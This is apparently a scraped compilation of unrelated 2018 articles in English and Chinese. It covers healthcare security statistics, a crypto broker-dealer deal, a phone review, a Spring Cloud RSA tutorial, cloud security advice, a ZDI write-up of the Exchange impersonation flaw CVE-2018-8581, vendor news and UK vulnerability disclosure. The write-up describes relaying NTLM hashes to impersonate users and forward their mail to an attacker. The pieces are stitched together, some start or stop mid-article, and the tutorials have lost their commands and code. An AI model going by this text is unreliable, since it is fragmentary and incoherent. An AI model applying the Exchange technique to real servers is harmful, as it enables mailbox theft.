“Healthcare organizations with a comprehensive security program are more likely to support critical security measures, such as data-loss prevention (12 percent higher adoption), bring-your-own-device management (13 percent higher adoption), database monitoring (13 percent higher adoption), provisioning systems (14 percent higher adoption), log management (16 percent higher adoption), and adaptive risk-based authentication for network access (16 percent higher adoption),” the report found.

The study also found that, while organizations are doing many of the basics, such as using passwords, firewalls, and having good device disposal polices in place healthcare organizations often lack other suggested practices such as mobile device management, unique user identifications or physical device locks, lack encryption for removable storage devices, and the encrypting of backups.

There was some good news. Most of the organizations surveyed do participate, many informally, in sharing cybersecurity information within a healthcare or cybersecurity group such as the Cyber Information Sharing and Collaboration Program, the National Cybersecurity and Communication Integration Center, or the Health Cybersecurity and Communication Integration Center.

Finally, while the majority of survey respondents believe they could recover their IT operations in the event of a disaster, the survey revealed there is much work to be done for many organizations. While sixty-eight percent believe that they could recover from the complete loss of their primary data center within 24 hours for their clinical, financial, supply chain management, and human resources and staffing systems. And almost all organizations have a data repository for backup, including off-site backups being used most frequently.

It’s good to see some cybersecurity progress in healthcare. As we’ve covered in When It Comes to Data Breaches, Healthcare Businesses Stand to Lose Most for eight healthcare organizations incurred the highest costs from data breaches, costing them an average $408 per lost or stolen record. Costs associated with data breaches in healthcare are nearly three times higher compared to other industries.

In Healthcare data breaches on the rise we covered how an analysis of healthcare data breaches for the first half of 2017 showed the healthcare industry to be on the path to suffer more than one data breach a day.

Highlights from that Breach barometer Report: Mid-Year Review, from patient privacy analytics monitoring provider Protenus and data breach tracking website databreaches.org showed that through June of last year there were 233 breaches reported to U.S. Health and Human Services (HHS), state attorneys general, or were reported in the media. Out of 193 of incidents in the report there was a total of 3,159,236 patient records exposed.

Hopefully, in the months and years ahead, healthcare will continue, if not increase, the investments necessary to reduce the number of breaches in that industry and make those breaches that do occur much less costly and impactful.

CoinSpeaker

TokenSoft , security tokens platform thatfocuses on the tokenization of traditional assets, has announced investing ina broker-dealer company registered with the Securities and Exchange Commission (SEC), now renamed as TokenSoft Global Markets, LLC. According to the press release ,TokenSoft is now entitled to acquire 100% of TokenSoft Global Markets, subject to regulatory approval.

As a result of the deal, TokenSoft will enable issuers to choose whether to host a token sale themselves or work with a broker-dealer to manage the token sale on their behalf. As for the company being acquired, TokenSoft Global Markets will expand its range of services tocustody solutions, referrals to exchanges, and private placements among others.

As the announcement states,those who choose to tap the expertise of a broker-dealer will be able to turn to TokenSoft Global Markets for guidance and hands-on support at every step of the sale process.

Mason Borda, CEO of TokenSoft, commented:

Lawson Baker , Head of Project Zeroat TokenSoft, said:

TokenSoftprovides a range of technology and security products for the sale, issuance, and management of digital assets.The company offers a new fundraising solution that could soon overtake initial coin offerings (ICOs). Recently, the company took part in funding round for crypto data startup Nomics, where $3 million has been raised.

Before the announcement about acquisition, TokeSoft partnered with Coinbase , with a view toprovide an alternative custody solution for clients. Now,STO issuers can choose betweenself-custody and third-party custody, in which Coinbase Custody is involved.

Announcing integration between TokenSoft Global Markets and Coinbase Custody to provide security token issuers access to institutional-grade security, and an intuitive and easy-to-use interface for storing and receiving funds. Read more: https://t.co/0FbGpPOM6l

― TokenSoft Inc. (@TokenSoftInc) December 20, 2018

For those who prefer Coinbase, the exchange will handle custody, insurance and auditable control of their digital assets, while Tokensoft will handle issues of compliance, regulation, distribution, and exchange relationships.Coinbase Custody will be made available through TokenSoft Global MarketsTokenSoft’s, a newregulated broker-dealer affiliateregistered with the Financial Industry Regulatory Authority (FINRA).

Coinbase Custody, launched in May of this year,provides a crypto asset storage service for high net-worth investors or institutions with over $10 million in deposits. Earlier, Coinbase Custody operated only in New York State, but now it is expanding its coverage to such European jurisdictions as Andorra, Gibraltar, Guernsey, Iceland, the Isle of Man and Lithuania, which means thatcustomers in these locations will be able to gain a full access to the Coinbase retail service, using the website and mobile apps for trading.

TokenSoft Expands Its Services Acquiring SEC-Registered Broker-Dealer

在MT欧洲之旅出行的前一天，收到了这部海信手机金刚4，正好带上它陪我一起欧洲自驾之旅，出发！

在到手之前，我做了一些功课，了解了海信手机金刚4的前世今生，海信手机金刚4主打续航和安全。整体机身采用了极简德式设计，海信手机金刚4采用了金色的边框，是类似香槟金的颜色，为海信手机金刚4手机更添一丝高雅。

背部采用了波西米亚纹理设计，运用重复的设计手法塑造浪漫、神秘、韵律的设计风格，非常有质感与档次感。硬朗的机身也有出色的握持感。海信手机金刚4后置1300万镜头，LED补光灯在下方，镜头和补光灯融合在一个模块中，可以让人一眼就能认出来。

海信手机金刚4正面搭载了一块6.22英寸的水滴全面屏，屏占比高达88.82%，几乎整个前端都被屏幕占用，这在一款千元机上较为难得，两侧和顶部的边框都比较窄，底部下巴略有宽度。这块屏幕采用了1520*720的分辨率，在正常距离下使用也看不到像素点，实际观感很不错。

海信手机金刚4的内核，搭载了骁龙 439，采用了8个A53核心，最高频率为1.95GHz，集成了Adreno 505 GPU，下行速率150Mbps。标配为4GB运存起步，提供了64GB的存储空间，可以满足日常娱乐需求。

预装了基于Android 8.1的VISION 6系统，牢牢的紧跟安卓大版本更新，整体的UI偏向大气、沉稳色，十分耐看。在使用上，VISION系统加入了很多AI功能--红包助手，悬浮导航、快捷助手等等。

欧洲12天，我去了捷克，奥地利和匈牙利，经过了很多美丽的小村庄，用海信手机金刚4随拍了一些美景给大家分享一下。

（位于捷克境内的人骨教堂，里面有4-7万中世纪因疾病、战争遗留下的人骨，使用海信手机金刚4拍摄）

同时它在这趟旅程中扮演了一个重要角色就是：移动WIFI热点共享。

因为海信手机金刚4的卖点，主打续航与安全，为了凸显其超强的续航能力，海信手机金刚4搭配了4500mAh超大电池，这在同类产品中并不多见，差异化比较明显。

官方给出的数据，海信手机金刚4的超长待机可以持续通话56.3小时，持续追剧15.3小时，支持反向充电，除了做手机还能当个充电宝。耳听为虚，实践出真知，让我来试试实际应用场景下 ，海信手机金刚4能有何等的表现？

我们飞机落地布拉格以后，就把当地手机卡插在海信手机金刚4上，为我们共享移动热点，每天的移动加热点功能全部开放，连接2~3部手机，一天下来电量依然在30%左右，超过现在所有的移动WiFi设备，电池使用方面也优于我正在使用的华为荣耀V10。 信号传输距离和信号质量也很满意。

（以下是基于海信手机金刚4拍摄的欧洲之行的样片）

回国后测试海信手机金刚4在线播放视频性能，为啥不在欧洲测，因为实在是玩的太嗨了，一路上都在流连于美景、美食。

打开最喜欢的英剧，做了一个长达五个小时的测试，中途还去打了两把吃鸡，最终剩余电量为53%。煲剧和游戏都比较耗电，由此看来，海信手机金刚4的续航能力确实非常强悍。这样的手机续航能力，能满足大多数场景的需求。

在隐私安全的保障上，海信手机金刚4的面部解锁速度非常快，并且手机屏幕可智能补光，从实际体验来看，它的人脸解锁非常迅速，解锁体验不错。但是值得注意的是，海信手机金刚4并不能使用面部识别来进行支付，需要使用更为安全的数字密码支付。

下面简单为大家介绍一下海信手机金刚4的几个非常有特点的系统智能应用，带大家进一步感受海信手机金刚4系统所带来的体验。

这项功能可将语音内容实时转化为文字，保存为备忘录，我在测试中发现，这个语音读取速度要比一般的两千元价位手机快一些。把玩了一上午，感觉它的识别速度非常快，这是令我十分惊喜的事情，高精度的语音识别，解放了双手，成为我外出必备的小助手。

用户可将私密联系人、短信、图片、文件和应用等放入隐私空间，对他人不可见。从此，你的小秘密就有了安身立命之所。除此之外，它在微信聊天界面截屏后，点击隐私马赛克可一键自动对聊天信息中的头像、昵称进行涂抹，省去了二次加工的环节，这样的小细节对于用户来说，非常贴心，省时省力。

总的来说，海信手机金刚4凭着优雅的工业设计、极致的拍照体验，安全的用户体验，超大电池续航能力强，在千元价位十分有竞争力；在千元机行列，这些贴合用户的用心设计，直击用户痛点；从性价比来看，物有所值。最后让我们一起来欣赏一下旅途中用海信手机金刚4拍摄的风景吧。

本文由极果视频体验师我是MT原创

RSA非对称加密有着非常强大的安全性，HTTPS的SSL加密就是使用这种方法进行HTTPS请求加密传输的。因为RSA算法会涉及Private Key和Public Key分别用来加密和解密，所以称为非对称加密。Private Key和Public Key有互操作性，即用private key加密的可以用public key解密，用public key加密的可以用private key解密。传统的单向认证则只用public key进行加密，有private key的一方才可进行解密。例如，一个web服务器会有一对private key和public key。浏览器客户端保存着服务器的public key。当客户端需要向服务器发送数据时，就用服务器的public key进行加密，然后服务器收到数据时，再用private key进行解密。客户端验证服务器是否为真实的服务器时，会根据服务器提供的public key和自己本地保存的public key作比较，一致的话才能验证服务器的真实性。

在我们的config server中，一些对加密要求比较高的可以采用RSA算法进行数据的加密和解密

我们需要使用jdk自带的keytool工具生成一个keystore，里边保存了private key的信息，使用如下命令行：

上述工具将产生的 privte key 保存在了名为server.jks的 key store 中。到目前为止，我们只产生了 private key，Spring Cloud Config Server 会根据我们提供的 key 的信息，每次会用程序生成一个 public key，参考如下源代码org.springframework.security.rsa.crypto.KeyStoreKeyFactory：

这里使用了 Java Security API 来对key进行操作。参见注释。然后上边的信息通过 configserver 中的 bootstrap.xml 配置文件提供：

因为我们不能同时使用对称加密和非对称加密，所以我们把 encrypt.key 配置注释掉，然后指定非对称加密的参数：

我们继续使用 encrypt API加密一项测试数据

返回加密后的字符：

然后测试解密

会返回

添加依赖

bootstrap.yml内容

访问： http://localhost:8888/service1/svt

返回内容已经解密了

{ "user.password": "23456789" }

This article was first published on Medium. You can take a look at it here .

Introduction

Cloud computing has been a popular buzzword in recent years, leading some to be skeptical of its benefits. There are considerable benefits to cloud computing but most are focused on cost effectiveness and speed. Rarely do people mention how security is a benefit of moving to the cloud. The reality is that the cloud can be as secure or insecure as you make it. However, if architected properly, it is possible to have a highly resilient, scalable, secure and compliant application in the cloud.

The first benefit of moving to the cloud is that the responsibility for securing the cloud environment is shared between the customer and the cloud vendor. In an on-premise environment, the customer handles all of the security (Figure 1). In a cloud environment, the customer is only responsible for security at the operating system and above (the light blue shaded sections in Figure 2). Moving to the cloud lets the customers focus their energy on building a robust and secure application.

Figure 1:

Figure 2:

Scalability & Resiliency

Hosting an application in the cloud enables you to take advantage of on-demand scalability. The lack of scalability in an application presents a customer experience issue as well as a security threat. As an application increases in popularity, it is harder to predict what time of day customers will be accessing the site. One server cannot handle millions of requests, but having hundreds of servers lay idle during low demands parts of the day is not an ideal solution either. Instead of buying more hardware and software resources as the application grows, you can provision resources on-demand and only pay for what you need. This saves money as you only pay for what you use.

Let’s imagine a situation where you have an e-commerce site and one of your items is suddenly very in demand. While the internet loves your product, the operations team, sees a huge spike in network traffic and suddenly the server is at capacity. Orders are not being processed, downloads are incredibly slow and customers are not happy. In a cloud environment, we can utilize autoscaling and elastic load balancing to ensure that this situation does not become reality. When the load balancer experiences too much load, it can trigger an autoscaling policy to spin up new servers. When the demand diminishes, we can scale our servers back down ensuring that we are not paying for unused resources. This way all orders are completed and download times are not affected, yielding happy customers.

Scaling is not only a cost-effective method, it also makes the application resilient. If you only have one physical server and that server ever experiences some type of hardware failure, it will take time to replace the server and have the application back up and running. In the cloud, if there’s a problem with one server, it can be easily terminated and a new one can be created in less than 5 minutes. It can even be an automated process making your life easier.

Similarly, in the event that your application suffers against a DDoS attack, there is little hope in thwarting the attempt. In a cloud environment, however, we can scale up and absorb the load of a DDoS attack. The key strategy behind a DDoS attack is to bring infrastructure to a breaking point. The strategy assumes that you cannot scale to meet the attack, its success depends on this assumption. Thus, the easiest way to defeat this strategy is to design the infrastructure to scale horizontally and vertically when needed. There are four benefits of scaling that we can take advantage of in mitigating a DDoS attack:

Scaling on-demand in the cloud provides resiliency and a means to protect an application from increased network traffic, hardware failures and DDoS attacks in a cost-effective manner. Next, we will discuss how a cloud environment can enable better identity and access management processes.

Identity and Access Management

The purpose of IAM is to provision, manage and de-provision identities that have access to your cloud environment’s infrastructure. With IAM, you can centrally manage users, security credentials, access keys and permissions policies that control which services and resources users can access. This is important because without an account permission strategy, anyone would have the ability to run privileged commands. Situations both unintentional and intentional could occur where someone could wreck havoc on the system using privileged commands. Setting up Identity and Access Management (IAM) in a cloud environment can help ensure that this does not happen.

The goal is to never have to login as the root user. There are four components to IAM which enable secure and least privilege access to the infrastructure and application.

Authentication is made simple in the cloud with the use of federated identity management (FIM). When using FIM, the application doesn’t need to focus on identification and authentication, just authorization. There are different federation standards that can be used for authentication including Single Sign On (SSO), SAML, Oauth, OpenID Connect and WS-Federation. These standards can be used to make sure that users, developers and admins only have the access they need, enforcing the principle of least privilege.

IAM helps us regulate who has access to the data, but we also need to be mindful of how we are protecting data in the cloud.

Data Protection

Using the same example of an e-commerce application, in the event of a hardware failure that causes data loss, you would lose more than just application code. Chances are, your application could contain sensitive customer information such as personally identifiable information (PII) and credit card information, which would also be lost.

Creating backups via snapshots is easy in the cloud. We can create snapshots for the database and storage volumes and restore data from these snapshots if necessary. Many cloud providers also have storage options, including archival storage, with high durability that can be part of our backup strategy.

We also want to make sure that we are securing any sensitive information that is either stored or processed through the application. Thus, we should encrypt data in transit and at rest. To encrypt data at rest, we should encrypt the whole disk or volume where the data is stored. While data is in transit, we should use TLS or VPNs to encrypt the data.

We also want to protect the application from common web exploits, such as SQL Injection and cross-site scripting, that could compromise security or affect availability. We want to filter out known bad IP addresses and monitor HTTP and HTTPs requests. We can use a web application firewall (WAF) to do this. Typically, firewalls are built in to the cloud environment with default deny which grants our application and data an extra layer of protection.

Protecting our data is not enough, we need to also ensure that we are compliant with any laws and regulations.

Compliance

Assuming our sample application processes credit card information, we need to make sure that we are PCI-DSS compliant. We can choose a cloud provider who is PCI-DSS compliant such as AWS or one that ensures that the way we store, process or transmit cardholder data in compliance with the standards. We should also make sure that we are in compliance with any data retention policies that exist. Lifecycle rules can be used in certain storage solutions to meet any data retention policies.

If the application ever goes through an audit, you won’t have to spend hours preparing for the audit as asset inventory and auditing tools are built-in cloud services. Since every call made in a cloud environment is an API call, there is extensive API call logging. Logs may contain console/API logins, high rate of API activity, new kinds of API activity and new IP addresses accessing the database. These logs can be useful in the event of a data breach or cyber-attack as well.

Setting up secure infrastructure, protecting our data and ensuring compliance will only be useful if the actual application code is secure. With the shift to the cloud, developers can start to embrace DevSecOps and its principles related to secure coding practices.

Secure Coding Practices

Following DevSecOps principles can lead to a robust patching strategy as well as secure code. One DevSecOps principle states “Automate security updates.” This is an important principle as it pertains to using automated tools for patching the OS, core services and the application itself. Developers can use tools such as Puppet and Chef to enable continuous patching in the cloud environment.

Another DevSecOps principle states, “Integrate and automate security scanning from the start.” To establish secure coding practices, we can embrace code analysis through both automated tools and manual code review. We should review the code every time there is a meaningful change in the code base. Additionally, we should conduct static and dynamic penetration tests against our code to find any vulnerabilities and then mitigate them before releasing the code into production.

Conclusion

As you can see, many characteristics of the cloud lend themselves nicely to security. We can use autoscaling to provide scalability and resiliency, IAM to regulate user and resource access, cloud services for data protection and compliance, and DevSecOps for secure coding practices. Thus it is possible to have secure applications in a cloud environment.

This is my twelfth post in my "What is" tech blog series. I'll be writing more every week here and on my blog !

这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1，400个报告中脱颖而出。今天我们将分析一个Exchange漏洞，它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。

在ZDI的Dustin Childs 12月的 文章 中，他提到了一个Exchange漏洞，允许Exchange服务器上的任何用户冒充该Exchange服务器上的任何人。虽然这个漏洞可以用于一些内网的劫持，但这个漏洞更有可能被用于钓鱼活动、窃取数据或其他恶意软件操作。作为2018年Top 5趣案系列的一部分，本文深入研究了这个SSRF(服务器端请求伪造)漏洞的细节，并展示了冒充过程是如何实现的。

该漏洞是由SSRF漏洞和其他漏洞相结合造成的。Exchange允许任何用户为推送订阅指定所需的URL，服务器将尝试向这个URL发送通知。问题出在Exchange服务器使用 CredentialCache.DefaultCredentials 进行连接：

在Exchange Web服务中，CredentialCache.DefaultCredentials在NT AUTHORITYSYSTEM上运行。这将导致Exchange Server向攻击者的服务器发送NTLM散列。Exchange服务器还默认设置了以下注册表项：

这允许我们使用这些NTLM散列来进行HTTP身份验证。例如，可以使用这些散列来访问Exchange Web服务(EWS)。由于它在NT AUTHORITYSYSTEM级别运行，攻击者可以获得TokenSerializationRight的“特权”会话，然后可以使用SOAP请求头来冒充任何用户。

下面是这样一个SOAP请求头的例子，它用SID S-1-5-21-4187549019-2363330540-1546371449-500 冒充管理员。

为了演示，我们将使用几个python脚本：

serverHTTP_relayNTLM.py 通过入站连接获取NTLM散列并用于EWS身份验证

exch_EWS_pushSubscribe.py 导致PushSubscription EWS调用serverHTTP_relayNTLM.py

你可以在 这里 下载这些脚本。你还需要python-NTLM模块。

漏洞的第一步是获取我们要冒充的用户的SID。一种可能的使用方法是这样的：

如果攻击成功，我们将在最后一个响应中看到 UpdateInboxRulesResponse ResponseClass=“Success” 。这意味着入站规则已添加到受害者邮箱中，所有入站电子邮件都将转发给攻击者。

现在一切就绪，是时候测试了。我们需要从任意帐户向受害者发送电子邮件，但与我们新规则中的目的地不相同(在本例是 attacker@contoso.local )，因为如果源和目的地是相同的地址，则该规则不会转发电子邮件。让我们以管理员身份登录并向受害者发送一些“敏感”信息：

检查攻击者的收件箱，我们看到消息成功转发：

正如我们所看到的，新的邮件被转发给攻击者。类似的结果可以通过其他EWS API实现，比如AddDelegate或将编辑权限分配给目标文件夹。

微软将该漏洞分配为CVE-2018-8581，并在11月份发布时给出 缓解措施 。实际上这个漏洞还没有修补程序。相反，Microsoft强调应该删除注册表项。删除这个键可启用回送检查。回想上面的内容，Exchange服务器默认设置了以下注册表项：

如果删除 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaDisableLoopbackCheck 键，则漏洞不可以。若要删除注册表项，请在CMD窗口中输入以下命令：

删除密钥后不需要重新启动或Exchange Server。公告指出，将来Exchange的更新在默认情况下将不再启用注册表项。

电子邮件已经成为我们商业生活的核心组成部分，Exchange Server多年来一直是一个热门的目标。该漏洞允许冒充用户，通过以前报告的 漏洞 允许任意代码执行。这两种情况都表明，有时最大的安全风险来自内部。这些漏洞还展示了外部攻击者如何从单个入口点在整个企业中扩散。

【51CTO.com原创稿件】在近日召开的亚信安全高级威胁治理十周年暨XDR战略发布会上，亚信安全通用安全产品总经理童宁回忆起APT概念未被广泛认知前这样说到：“十年前，我们开始警惕APT，并告知用户也要警惕，但没人能听得懂，也没人意识到APT的存在。随着数据泄露事件的增多，大家将其归为数据安全问题或者监管安全问题，其实它本质上是APT。”

通过不断的演化发展，APT已经成为最具攻击性、隐蔽性、破坏性的网络威胁。如今，在APT攻击的穹庐之下，几乎所有国家、所有行业都无一幸免。

亚信安全通用安全产品总经理童宁

回顾威胁治理的这十年，童宁表示: “十年间，我们经历了摸索、创新、融合、螺旋迭代的过程，与不法分子的博弈成就了亚信安全在高级威胁治理领域的引领。这是一场漫长的对决，关乎未来，以及未来的未来。”

亚信安全产品总监白日表示，整个安全威胁的演化在20年左右，从90年代末病毒的大规模爆发到2005年左右销声匿迹，再到2007年典型APT攻击事件不断出现，威胁演化可划分为三个阶段：

第一个阶段，大规模病毒爆发时期，有很多的黑客和攻击者是为了一战成名，而制作传播恶意病毒;

第二个阶段，威胁攻击手段主要应用于国家和国家之间，含有政治意图包;

第三个阶段，威胁中蕴含着大量的黑产。黑产从业者通过有针对性的勒索软件攻击等形式，获取现金利益。

由此可见，威胁演化的每一个阶段所在的本质和性质也不一样，所以在每一个阶段，相关威胁的治理手段和措施也不一样。

因此，十年来，亚信安全的高级威胁治理战略也在随之不断演化。2008年，趋势科技(2015年亚信科技收购趋势科技中国，成立亚信安全)正式发布APT高级威胁治理战略，形成了1.0的战略雏形。

2015年，亚信安全发布了“螺旋迭代”的APT治理战略2.0，该战略治理模型以监控为中心，以侦测、分析、响应、预防为四个治理过程，此外，还提出两大支撑体系，即本地和云端威胁情报双回路，以及全面的威胁联动治理体系，产品维度实现了“云、管、端”全线安全产品的联动;管理维度实现了从侦测、分析，到响应、阻止的全过程联动。

（图片内容来自亚信安全）

如上所述,为过去十年亚信安全的高级威胁治理战略，下一个十年，亚信安全有何治理战略对策呢?

“现在，亚信安全从安全运维的视角出发，提出了通过SOAR平台的精密编排能力，打造一套安全联动运维体系的理念，这也是下一代威胁治理战略3.0的雏形。”白日表示。

从过去十年，APT威胁治理能力的发展来看，通过技术和产品的不断演化、组合、联动，用户基本可以做到发现、分析，然而对于响应和预测来说，其实现的难度正在逐步加大。例如，当用户接收到的海量的告警时，由于用户技术能力有限而无法做出快速的响应，缺乏快速恢复不救的能力，更无法确认攻击意图溯源。

思及此，亚信安全开始全面打造精密编排的往来空间恢复补救能力，在高级威胁治理3.0战略中，亚信安全提供了快速响应能力。

亚信安全认为，从发现到响应的能力构成包含四个方面：告警处理，分类并划分安全事件优先级;定性分析，判断威胁的真实性，确认威胁的本质和意图;定量分析，回溯攻击场景，评估威胁的严重性、影响和范围;快速响应，根据响应脚本，执行响应策略。这四个方面，组成了亚信安全以安全运维为视角的SOAR框架。

（图片内容来自亚信安全）

亚信安全的SOAR框架利用精密编排的联动安全解决方案，将安全产品以及安全流程连接和整合起来，通过全面收集的安全数据和告警，集成人工专家以及机器学习的力量来进行事故分析。

SOAR能带来什么样的价值呢?对此，白日向记者介绍说，第一，可以缩短应急响应时间，提高应急响应效率;第二，可以减少和优化传统SOC中不必要和冗余的工作;第三，安全产品整合的API加速了自动化过程;第四，能做丰富的相关的数据安全的服务，比如威胁情报平台;第五，提高告警分析质量和侦测发现能力;第六，提高工作精准度;第七，减少培训新安全运维分析人员的代价;第八，提高整体衡量管理安全的运维能力。

基于SOAR，亚信安全正式推出了高级威胁治理3.0战略雏形――XDR战略。亚信安全通用产品管理副总经理刘政平表示，“X”代表未知，代表各种应用场景，例如车联网、智慧医疗等;“D”代表传感器，无论是云架构、网络架构，还是终端上均需要建立不同的监控机制和数据还原机制，以及数据还原机制;“R”代表响应机制，借助SOAR框架，实现精密编排的联动响应。

亚信安全的XDR方案包括了“准备、发现、分析、遏制、消除、恢复、优化”这7个阶段，准备阶段包括了针对每一种黑客攻击类型的标准预案，自发现威胁数据之后，将数据集中到本地威胁情报和云端威胁情报做分析，利用机器学习和专家团队，通过分析黑客进攻的时间、路径、工具等所有细节，其特征提取出来，再进行遏制、清除、恢复和优化。

刘政平表示，尽管过去未去，但未来已来。“我们要加强精密编排的预案，把响应过程非常严谨的写下来，并变成知识沉淀，让更多的人可以去学习。最终实现，让人的行业经验迭代起来，记录预案并不断优化它。”然而，有了好的方法论还不够，还需要好的工具。

（图片内容来自亚信安全）

在XDR战略中，亚信安全引入了EDR、NDR、MDR等新工具，包括深度威胁发现设备TDA、深度威胁分析设备DDAN、深度威胁安全网关Deep Edge、深度威胁邮件网关DDEI、服务器深度安全防护系统 Deep Security，以及能够统一联动管理的控制管理中心Control Manager和APT治理专属咨询服务，进而实现威胁从发现、分析到响应的闭环。

最后，刘政平总结说：“我们希望在不确定的网络安全世界里，寻找一个确定性的方法，帮助用户真正提升网络空间恢复补救的能力。”

【51CTO原创稿件，合作站点转载请注明原文作者和出处为51CTO.com】

Holiday season is soon here and it’s good to take a short break from work and maybe learn or code some new things while relaxing and enjoying the winter time outside. Here’s the monthly notes for December. Happy holidays!

How to Exclude an App From Dark Mode in macOS Mojave

“You can enable the old dark menu bar and dock look, you can also selectively exclude individual apps from dark mode.”

Tips of ppl who want to learn

ReaktorNow Development Discussion campaign shared some insights in the field of software engineering. “Always keep learning and expanding your skills, and remember to step out of your comfort zone.”

Beyond Cryptocurrencies

Intro to crypto talk at the a16z summit. (from @ljxie )

A novice’s guide to learning to code with CS50

“CS50 is the best learning experience I have ever had in my life.” Over 12 weeks you get two hour lecture to watch and a problem set for you to complete each week. Start with Scratch, continue on C and move to python plus HTML, CSS, SQL, javascript, JQuery and JSON. (from @walokra )

Taking Down an Insider Threat

Excellent story about pentesting from the inside. And of great digital forensics and incident response team and meticulously implemented security practices.

OWASP AppSec EU 2018 presentations

Presentations from OWASP AppSec EU 2018 are available from Youtube.

Everything about distributed systems is terrible

Hillel Wayne 38 minutes talk at Code Mesh LDN 18 titled “Everything about distributed systems is terrible” talks about TLA+, formal specification system designed by Leslie Lamport. The claim is that you can find bugs in your (distributed) system by model checking that could be practically impossible to find with testing or in production.

Rockwell Automation and a group of automation organizations have joined an OPC Foundation initiative to extend the OPC UA protocol. Specifically, a series of working groups has formed to bring the OPC UA protocol’s vendor-independent, end-to-end interoperability out to devices in the field. The initiative plans to address use cases not currently in scope for EtherNet/IP. The goal is to help simplify other use cases―especially in multi-vendor, controller-to-controller environments and for the vertical integration of field devices.

Here are the logos of the companies involved in the initiative to bring OPC UA to field devices. (Image source: Rockwell Automation)

Rockwell sees the need to extend OPC UA as part of the build-out of advanced manufacturing. “Smart manufacturing is making a number of things more relevant. Flexible manufacturing applications drive flexible communications. And analytics require more interaction between devices and software and devices and the cloud,” Paul Brooks, business development manager for networks at Rockwell Automation, told Design News . As we look at that changing dynamic, we see places where OPC UA can add value. We’ve moved, and the OPC Foundation has moved, and we find ourselves in the middle.”

The companies involved in the initiative include: ABB, Beckhoff, Bosch-Rexroth, B&R, Cisco, Hilscher, Hirschmann, Huawei, Intel, Kalycito, KUKA, Mitsubishi Electric, Molex, Moxa, Omron, Phoenix Contact, Pilz, Rockwell Automation, Schneider Electric, Siemens, TTTech, Wago, and Yokogawa.

In a statement, Rockwell noted that the company is the primary author of the EtherNet/IP specifications and understands that EtherNet/IP users may see compatibility risks in technology developed for a different ecosystem. Rockwell intends to mitigate these risks through both its ongoing development of EtherNet/IP and its intentions for the OPC UA protocol. “We’ve been a member of OPC since it was founded. We were part of writing the specifications,” said Brooks. “We use OPC UA in many of our communications devices. We’ve been on this journey for 14 or 15 years.”

OPC UA is generally considered an inherently secure protocol, which is one of the advantages when taking it beyond the plant wall. “The OPC Foundation was one of the first organizations to bake security into the protocol,” said Brooks. “OPC UA is more present in software than other Ethernet protocols. We need to make sure all of the use cases include controller-device communications that get included into the analysis, and we need to make sure the security offering from OPC UA is sufficient down to the device.”

Rockwell Automation’s priorities within the new OPC Foundation initiative include working to help ensure the following:

Industrial Ethernet: Moving toward a Single Network Vision

IIC Track and Trace Testbed Forges Requirements for IIoT Standard

Using Switching Technology to Overcome Automation Protocol Clash

Brooks noted that extending the OPC UA protocol out to field devices will be entirely up to each customer. “Our objective is that our customers get to choose when it use the technology rather than the technology making the decision,” said Brooks. “So, we build it and demonstrate its value to our customers. Then it’s up to them.”

Rob Spiegel has covered automation and control for 17 years, 15 of them for Design News . Other topics he has covered include supply chain technology, alternative energy, and cyber security. For 10 years, he was owner and publisher of the food magazine Chile Pepper.

It’s like a bug bounty programme but without the bounty, yet.

Security researchers who find vulnerabilities in UK government web services can now report them directly to the National Cyber Security Council (NCSC), rather than wondering who to tell and whether they’ll get prosecuted for doing so.

That’s according to “Ollie” the NCSC’s vulnerability disclosure lead, who announced a newvulnerability reporting service in a blog published on Thursday.

The service acknowledges the “crucial rolesecurity researchers play in helping to secure UK government web services”, he wrote.

“The quickest way to remediate a security vulnerability is to report it to the system owner. However we appreciate that it can be hard to find the right contact, soresearchers can now report the vulnerability to us .”

Along with direct disclosure, it has also launched a pilot bug bounty programme through HackerOne, albeit sans bounty.

“We are keen to show our appreciation by issuing HackerOne reputation points to those that disclose”, the NCSC writes.

“Having a mature and co-ordinated vulnerability disclosure process helpsdecreasethe risk of an incident occurring”, Ollie adds.

The pilot’s aim is toidentify the best way to help fellow government organisations establish a vulnerability disclosure process. HackerOne has been selected as the bug bount platform providerand NCC Group as the assessment partner.

The work my company @LutaSecurity is doing w @NCSC to ensure they are following vulnerability disclosure best practices is highlighted in a new blog by Ollie, the UK gov technical lead.

"The quickest way to remediate a security vulnerability is to report it to the system owner." https://t.co/Gx3l4b4xPO

― Katie Moussouris (@k8em0) December 19, 2018

Vunerability disclosure authority Katie Moussouris’s Luta Security has been supporting the NCSC to ensure it is following industry best practice.

HackerOne allows organisations to get their networks and applications tested for cyber vulnerabilities via its centralised platform by a largely freelance coterie of hackers. Those that can demonstrate success exploits typically earn cash.

The UK arguably lags the US somewhat in this regard. The “Hack the Pentagon”crowd-sourced security programme with HackerOne launched in 2016 and has resulted in the resolution of over 3,000 security vulnerabilities thus far.

The US’s Hack the Army programme in December 2016 surfaced 118 valid vulnerabilities and paid out $100,000. Thefirst Hack the Air Forcebug bounty challenge resulted in 207 valid reports and hackers earned more than $130,000.

Chris Wallis, founder of Intruder, told Computer Business Review: “It’s great to see the NCSC rolling out a vulnerability disclosure programme for the U.K. Government. No organisation can hope to secure every last piece of the puzzle, so these programmes are now a crucial step for any mature cyber security operation. Many security researchers will delight in the kudos of finding weaknesses in Government systems, although for some there will remain the temptation to sell vulnerabilities to the highest bidder, especially while no monetary rewards are on offer.”

The NCSC adds: “Given the recent GCHQ publication , it’s also important to highlight that anything reported to us is exempt from the equities process and will be disclosed.”

It was referring to a recent publication that detailed why and when UK intelligence services choose not to disclose vulnerabilities in software.

With regard to the bug bounty programme, Charl van der Walt, Chief Security Strategy Officer for SecureData Europe, earlier told Computer Business Review: “Bug bounty programmes have absolutely been a good thing.”

“They’ve given the offensive side of the fence a way to cleanly monetise vulnerabilities selling on the black market is tricky; how do you know you’re not selling to a cop? and generated a lot of really useful data.”

He added: “I was recently asked if participating is a bit like ‘painting a target on your head’. The short answer is no: there is no way of staying under the radar.”

“The bad guys will find you anyway. And these programmes can also really motivate a company: CISOs rarely get enough attention and participation seems to galvanise executives; things start happening that never did before.”

Microsoft just announced Project Mu , promising “firmware as a service” on supported hardware. Every PC manufacturer should take note. PCs need security updates to their UEFI firmware, and PC manufacturers have done a poor job of delivering them.

Modern PCs useUEFI firmware instead of a traditionalBIOS. The UEFI firmware is the low-level software that starts when you boot your PC. It tests and initializes your hardware, does some low-level system configuration, and then boots an operating system from your computer’s internal drive or anotherboot device.

